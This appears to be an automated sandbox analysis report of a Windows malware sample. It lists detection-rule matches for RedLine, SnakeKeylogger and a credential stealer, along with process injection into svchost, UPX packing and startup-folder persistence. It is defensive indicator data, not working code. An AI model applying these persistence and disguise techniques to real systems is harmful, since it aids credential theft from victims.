                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.4522422465.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.4522419092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000005.00000002.2206920824.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2089442641.0000000001290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: B7N48hmO78.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9888500650074294
                  Source: demonetised.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9888500650074294
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2CE7A GetLastError,FormatMessageW,0_2_00E2CE7A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1AB84 AdjustTokenPrivileges,CloseHandle,0_2_00E1AB84
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E1B134
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5AB84 AdjustTokenPrivileges,CloseHandle,2_2_00D5AB84
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00D5B134
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E2E1FD
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E26532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00E26532
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E3C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00E3C18C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00DE406B
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeFile created: C:\Users\user\AppData\Local\inhumateJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | File created: C:\Users\user\AppData\Local\Temp\autA0D9.tmp
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs"
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005588000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005556000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005548000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2280827631.00000000063ED000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.000000000557B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005538000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000540A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005419000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005428000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000544C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2397824219.00000000062BD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: B7N48hmO78.exe | Virustotal: Detection: 73%
                  Source: B7N48hmO78.exe | ReversingLabs: Detection: 79%
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | File read: C:\Users\user\Desktop\B7N48hmO78.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\B7N48hmO78.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Process created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Sections loaded: apphelp.dll, iphlpapi.dll, mpr.dll, userenv.dll, uxtheme.dll, version.dll, wininet.dll, winmm.dll, wsock32.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Sections loaded: apphelp.dll, iphlpapi.dll, mpr.dll, userenv.dll, uxtheme.dll, version.dll, wininet.dll, winmm.dll, wsock32.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll
                  Source: C:\Windows\SysWOW64\svchost.exe | Sections loaded: kernel.appcore.dll, uxtheme.dll, mscoree.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, dpapi.dll
                  Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Binary string: _.pdb source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00F02F90 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_00F02F90
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E705B8 push ss; ret 0_2_00E705B9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E06B05 push ecx; ret 0_2_00E06B18
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00DB05B8 push ss; ret 2_2_00DB05B9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D46B05 push ecx; ret 2_2_00D46B18
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00423149 push eax; ret 3_2_00423179
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004231C8 push eax; ret 3_2_00423179
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040E21D push ecx; ret 3_2_0040E230
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_077FE558 push eax; iretd 3_2_077FE559
                  Source: initial sample | Static PE information: section name: UPX0
                  Source: initial sample | Static PE information: section name: UPX1
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | File created (dropped file): C:\Users\user\AppData\Local\inhumate\demonetised.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | File created (dropped file): C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E48111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00E48111
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00DFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00DFEB42
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D88111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00D88111
